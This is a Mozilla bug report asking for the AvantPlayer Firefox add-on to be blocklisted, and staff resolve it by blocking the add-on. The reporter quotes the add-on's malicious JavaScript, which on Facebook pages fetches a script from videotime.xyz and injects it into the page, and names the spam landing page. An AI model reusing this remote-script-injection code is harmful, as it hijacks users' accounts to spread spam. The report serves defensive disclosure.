Closed Bug 1212174 Opened 10 years ago Closed 10 years ago

found malicious addon must be blacklisted

Categories

(Toolkit :: Blocklist Policy Requests, defect)

Product:
Toolkit
Component:
Blocklist Policy Requests
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED FIXED

People

(Reporter: mafiaecel, Assigned: jorgev)

Details

(Whiteboard: [qa-])

Attachments

(1 file)

AvantPlayer.xpi
10.00 KB, application/zip
Details
Attached file AvantPlayer.xpi
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2522.0 Safari/537.36 Steps to reproduce: hi this addon as you see http://i.imgur.com/07aMKGk.png spams facebook accounts here is the malicious code snippet if(doc.location.href.search("facebook.com") > -1){ var request = new XMLHttpRequest; request.onreadystatechange = function() { if (request.readyState == 4) { var myScript = top.window.content.document.createElement('script'); myScript.type = 'text/javascript'; myScript.appendChild(document.createTextNode(request.responseText)); myScript.setAttribute('onload', 'firefoxInit()'); top.window.content.document.getElementsByTagName('head')[0].appendChild(myScript); }; }; request.open("GET", "https://videotime.xyz/welcomef/document.php?" + "" + Math.floor(Math.random() * 99999)); request.send(); } https://videotime.xyz/welcomef/document.php? here is the link they are remote executing they are sharing porn links on facebook accounts http://myvideoz.xyz/async.php this is the their landing page Actual results: spammed facebook accounts Expected results: mustnt share porn links on my acebook account
Jorge/Kris, can you take a look? (NB: I haven't looked at the add-on yet)
Group: firefox-core-security → mozilla-employee-confidential
Component: Untriaged → Blocklisting
Flags: needinfo?(kmaglione+bmo)
Flags: needinfo?(jorge)
Product: Firefox → addons.mozilla.org
Version: 41 Branch → unspecified
It's very similar to bug 1212451. ID: gjhrjenrengoe@jfdnkwelfwkm.com
Assignee: nobody → jorge
Group: mozilla-employee-confidential
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
Flags: needinfo?(kmaglione+bmo)
Flags: needinfo?(jorge)
Whiteboard: [qa-]
Target Milestone: --- → 44.2
Blocked: https://addons.mozilla.org/blocked/i1042
Status: ASSIGNED → RESOLVED
Closed: 10 years ago
Resolution: --- → FIXED
may you blacklist their landing page also ? http://myvideoz.xyz/async.php
We don' have that capability. If you can report it to Google and it's added to their blacklist, then Firefox will not display it.
Product: addons.mozilla.org → Toolkit
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: